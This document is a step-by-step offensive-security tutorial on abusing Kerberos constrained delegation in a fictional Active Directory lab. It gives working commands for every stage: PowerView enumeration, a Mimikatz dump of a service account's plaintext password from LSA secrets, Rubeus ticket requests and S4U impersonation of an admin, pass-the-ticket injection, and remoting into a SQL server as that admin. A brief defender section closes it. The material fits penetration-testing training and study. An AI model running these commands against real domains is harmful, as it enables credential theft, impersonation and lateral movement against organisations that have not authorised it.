Constrained Delegation Attack Path – Full Workflow Example
Goal:
Start as a low-privileged domain user and escalate to a server-level administrator using Constrained Delegation abuse.
Lab Environment (Fictional Setup):
| Component | Name |
|---|---|
| Domain Name | intranet.offensive.local |
| Domain Controller | DC01.intranet.offensive.local |
| Web Server | WEB01.intranet.offensive.local |
| SQL Server | SQL01.intranet.offensive.local |
| Tier 1 Admin | t1_john.murphy |
| Service Account | svcWebApp |
| Your Low-Priv User | alice.reed |
Step-by-Step Constrained Delegation Abuse
Step 1: Initial Access
You’re logged in or have a shell as alice.reed, a regular domain user. You start enumerating the environment.
Step 2: Identify Users Trusted for Delegation
We check which accounts have constrained delegation rights.
Tool: PowerView
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
Output:
svcWebApp -> can delegate to: HTTP/SQL01.intranet.offensive.local
Translation: If we can control svcWebApp, we can impersonate any user to the HTTP service on SQL01.
Step 3: Hunt for svcWebApp on the Network
We want to find where svcWebApp is used. This could be:
- A scheduled task
- A running service
- An IIS App Pool identity
- A saved credential
On a compromised host (e.g., WEB01), check:
Get-WmiObject Win32_Service | Where-Object { $_.StartName -like "*svcWebApp*" }
You find a Windows service running as intranet\\svcWebApp on WEB01.
Step 4: Dump Credentials (Assume Admin on Host)
Since you have admin on WEB01, use Mimikatz to dump the password:
.\mimikatz.exe
mimikatz # token::elevate
mimikatz # lsadump::secrets
Output:
Secret : _SC_WebAppUpdater
cur/text: S3rv1ceP@ssword!
Now you have the plaintext password for svcWebApp.
Step 5: Request a TGT for svcWebApp
Use Rubeus or Kekeo to get a TGT with the password you dumped.
Rubeus:
Rubeus.exe asktgt /user:svcWebApp /domain:intranet.offensive.local /password:S3rv1ceP@ssword! /nowrap
You get a TGT .kirbi file for svcWebApp.
Step 6: Forge TGS for a Target User to Allowed Service
Let’s impersonate t1_john.murphy (a known Tier 1 Admin).
Since svcWebApp can delegate only to HTTP/SQL01, we need to generate a TGS that says:
“I am
t1_john.murphy, give me access toHTTP/SQL01.”
Rubeus:
Rubeus.exe s4u /user:svcWebApp /password:S3rv1ceP@ssword! /impersonateuser:t1_john.murphy /msdsspn:http/SQL01.intranet.offensive.local /domain:intranet.offensive.local
You receive a .kirbi TGS ticket.
Step 7: Inject the Ticket into Memory
Now that we have the TGS, we inject it with Mimikatz or Rubeus.
Mimikatz:
privilege::debug
kerberos::ptt <ticket.kirbi>
OR Rubeus:
Rubeus.exe ptt /ticket:<ticket.kirbi>
Step 8: Access the Target System (SQL01)
Let’s test access by initiating a PowerShell Remoting session to SQL01.
Enter-PSSession -ComputerName SQL01.intranet.offensive.local
whoami
Output:
intranet\\t1_john.murphy
Boom — you now have a remote session on SQL01 as a Tier 1 Admin via constrained delegation abuse.
Summary of What You Did
| Phase | Action |
|---|---|
| Recon | Found svcWebApp can delegate to HTTP/SQL01 |
| Host Enum | Discovered a service running as svcWebApp on WEB01 |
| Post-Exploitation | Used Mimikatz to dump svcWebApp’s credentials |
| Ticket Crafting | Used Kekeo/Rubeus to get a TGT and forge TGS |
| Ticket Injection | Loaded forged tickets into memory |
| Lateral Movement | Remoted into SQL01 as a Tier 1 Admin |
Defender Notes: How to Prevent This
- Minimize delegation: Avoid giving service accounts delegation unless truly necessary.
- Audit trustedToAuthForDelegation regularly.
- Use gMSAs instead of regular service accounts when possible.
- Detect forged tickets using Event ID 4769 anomalies and TGS request patterns.
- Deploy Windows Defender for Identity / Microsoft ATA to monitor ticket behavior.